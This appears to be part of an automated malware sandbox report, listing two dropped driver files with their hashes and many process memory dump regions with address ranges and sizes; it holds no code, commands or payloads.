29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

Download Submit
C:\Windows\System32\drivers\klupd_367f83e6a_klbg.sys

Filesize
199KB

MD5
424b93cb92e15e3f41e3dd01a6a8e9cc

SHA1
2897ab04f69a92218bfac78f085456f98a18bdd3

SHA256
ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

SHA512
15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

Download Submit
C:\Windows\System32\drivers\klupd_367f83e6a_mark.sys

Filesize
260KB

MD5
66522d67917b7994ddfb5647f1c3472e

SHA1
f341b9b28ca7ac21740d4a7d20e4477dba451139

SHA256
5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

SHA512
921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

Download Submit
memory/1392-136-0x00000000054F0000-0x0000000005844000-memory.dmp

Filesize
3.3MB

Download
memory/1392-154-0x0000000006F30000-0x0000000006F52000-memory.dmp

Filesize
136KB

Download
memory/1392-122-0x0000000000D90000-0x0000000000DC6000-memory.dmp

Filesize
216KB

Download
memory/1392-123-0x0000000004C00000-0x0000000005228000-memory.dmp

Filesize
6.2MB

Download
memory/1392-124-0x0000000005260000-0x0000000005282000-memory.dmp

Filesize
136KB

Download
memory/1392-126-0x0000000005470000-0x00000000054D6000-memory.dmp

Filesize
408KB

Download
memory/1392-125-0x0000000005400000-0x0000000005466000-memory.dmp

Filesize
408KB

Download
memory/1392-137-0x0000000005AD0000-0x0000000005AEE000-memory.dmp

Filesize
120KB

Download
memory/1392-138-0x0000000005B20000-0x0000000005B6C000-memory.dmp

Filesize
304KB

Download
memory/1392-155-0x0000000007E30000-0x00000000083D4000-memory.dmp

Filesize
5.6MB

Download
memory/1392-139-0x0000000007200000-0x000000000787A000-memory.dmp

Filesize
6.5MB

Download
memory/1392-140-0x0000000006010000-0x000000000602A000-memory.dmp

Filesize
104KB

Download
memory/1392-153-0x0000000006FA0000-0x0000000007036000-memory.dmp

Filesize
600KB

Download
memory/1660-163-0x0000000000B70000-0x0000000001029000-memory.dmp

Filesize
4.7MB

Download
memory/1660-168-0x0000000000B70000-0x0000000001029000-memory.dmp

Filesize
4.7MB

Download
memory/1724-297-0x000001FC66560000-0x000001FC66582000-memory.dmp

Filesize
136KB

Download
memory/1900-334-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/1900-333-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/1972-192-0x0000000005D90000-0x00000000060E4000-memory.dmp

Filesize
3.3MB

Download
memory/2628-180-0x0000000005C80000-0x0000000005CCC000-memory.dmp

Filesize
304KB

Download
memory/2628-178-0x0000000005600000-0x0000000005954000-memory.dmp

Filesize
3.3MB

Download
memory/2872-262-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/2872-261-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/3880-0-0x00000000009C0000-0x0000000000E85000-memory.dmp

Filesize
4.8MB

Download
memory/3880-17-0x00000000009C0000-0x0000000000E85000-memory.dmp

Filesize
4.8MB

Download
memory/3880-1-0x0000000077D24000-0x0000000077D26000-memory.dmp

Filesize
8KB

Download
memory/3880-2-0x00000000009C1000-0x00000000009EF000-memory.dmp

Filesize
184KB

Download
memory/3880-4-0x00000000009C0000-0x0000000000E85000-memory.dmp

Filesize
4.8MB

Download
memory/3880-3-0x00000000009C0000-0x0000000000E85000-memory.dmp

Filesize
4.8MB

Download
memory/4472-33-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-18-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-23-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-36-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-330-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-40-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-148-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-20-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-19-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-22-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-71-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-263-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-21-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4472-87-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/4496-21573-0x0000000000400000-0x0000000000CDB000-memory.dmp

Filesize
8.9MB

Download
memory/4496-21578-0x0000000000400000-0x0000000000CDB000-memory.dmp

Filesize
8.9MB

Download
memory/4916-283-0x0000000000400000-0x0000000000682000-memory.dmp

Filesize
2.5MB

Download
memory/5088-233-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/5088-234-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/5832-286-0x0000000000960000-0x0000000000962000-memory.dmp

Filesize
8KB

Download
memory/5832-287-0x0000018CBC490000-0x0000018CBC501000-memory.dmp

Filesize
452KB

Download
memory/5832-294-0x0000018CBC490000-0x0000018CBC501000-memory.dmp

Filesize
452KB

Download
memory/5832-295-0x0000018CBC490000-0x0000018CBC501000-memory.dmp

Filesize
452KB

Download
memory/5832-296-0x0000018CBC490000-0x0000018CBC501000-memory.dmp

Filesize
452KB

Download
memory/5880-344-0x00000000008C0000-0x0000000000A48000-memory.dmp

Filesize
1.5MB

Download
memory/5880-342-0x00000000008C0000-0x0000000000A48000-memory.dmp

Filesize
1.5MB

Download
memory/5880-335-0x0000000140000000-0x000000014043C000-memory.dmp

Filesize
4.2MB

Download
memory/5880-340-0x00000000008C0000-0x0000000000A48000-memory.dmp

Filesize
1.5MB

Download
memory/5880-339-0x00000000008C0000-0x0000000000A48000-memory.dmp

Filesize
1.5MB

Download
memory/5880-338-0x00000000008C0000-0x0000000000A48000-memory.dmp

Filesize
1.5MB

Download
memory/5880-337-0x00000000008C0000-0x0000000000A48000-memory.dmp

Filesize
1.5MB

Download
memory/5880-341-0x00000000008C0000-0x0000000000A48000-memory.dmp

Filesize
1.5MB

Download
memory/5880-343-0x00000000008C0000-0x0000000000A48000-memory.dmp

Filesize
1.5MB

Download
memory/6136-256-0x0000000000380000-0x0000000000839000-memory.dmp

Filesize
4.7MB

Download
memory/6136-260-0x0000000000380000-0x0000000000839000-memory.dmp

Filesize
4.7MB

Download
memory/8972-21119-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/8972-21117-0x0000000000820000-0x0000000000CE5000-memory.dmp

Filesize
4.8MB

Download
memory/9972-21553-0x0000000000400000-0x0000000000E17000-memory.dmp

Filesize
10.1MB

Download
memory/9972-21304-0x0000000000400000-0x0000000000E17000-memory.dmp

Filesize
10.1MB

Download
memory/12124-21006-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download
memory/12124-21043-0x0000000000400000-0x000000000086B000-memory.dmp

Filesize
4.4MB

Download